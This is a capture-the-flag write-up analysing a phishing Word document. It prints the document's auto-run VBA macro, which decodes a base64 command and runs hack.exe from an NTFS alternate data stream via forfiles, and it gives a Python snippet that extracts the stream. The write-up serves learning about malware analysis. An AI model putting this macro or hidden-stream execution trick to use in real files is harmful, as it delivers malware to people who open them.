The office is a dangerous place. Last week Pam (the secretary) got an email, containing an archive. She ALMOST opened it, but then she remembered the IT security training from last month and fortunately decided to send the file to you. Somethings was phishy about the sender address to her. It was a close call to say the least…
- This challenge cannot be solved on any file systems other than NTFS.
- If you want to see the challenge in action, you have to use a Windows box with Office installed. In addition, add the folder where the challenge is extracted to to
Trusted Locations(help for that). The challenge can be solved without actually running anything.
- Windows Defender and other AVs might flag the files as dangerous, these are false positive alerts.
- Author: chronos
- Attachments: office_hazard.rar
I’ve read enough stuff about CTFs and Word documents, to know, that we are looking at a VBA script challenge. Setting up a VM, and opening the Word doc, a totally not sus command prompt is opened. I quickly extracted the VBA script using olevba. Its a not so big script, so thankfully, it isn’t VBA reversing.
Private Sub Document_Open() Dim DecodedCode DecodedCode = DecodeBase64("Zm9yZmlsZXMgL1AgQzpcV2luZG93c1xTeXN0ZW0zMiAvbSBjYWxjLmV4ZSAvYyAlY2QlXHNlY3JldC50eHQ6aGFjay5leGU=") CreateObject("WScript.Shell").Exec ("cmd /c " & DecodedCode) End Sub Function DecodeBase64(b64$) Dim b With CreateObject("Microsoft.XMLDOM").createElement("b64") .DataType = "bin.base64": .Text = b64 b = .nodeTypedValue With CreateObject("ADODB.Stream") .Open: .Type = 1: .Write b: .Position = 0: .Type = 2: .Charset = "utf-8" DecodeBase64 = .ReadText .Close End With End With End Function
The code above is run once on opening the document. Decoding the base64 string, we can see, that we are running the following command:
cmd /c forfiles /P C:\Windows\System32 /m calc.exe /c %cd%\secret.txt:hack.exe
This basically runs the command forfiles, which is just a magic for running the command defined with the second
/c only once (since
calc.exe is matched once only in the
It does some magic with the
secret.txt file. And what is that syntax with the colon? Turns out the reason why
NTFS was requested is Alternate Datastreams.
I wrote a quick few-liner in python to extract the data (I suck at ps, sorry):
with open('secret.txt:hack.exe', 'rb') as f: with open('hack.exe', 'wb') as f2: f2.write(f.read())
All is left for us, to dig the flag out from the
hack.exe binary. Loading the binary into
Ghidra and doing a quick search for “flag” gets the job done: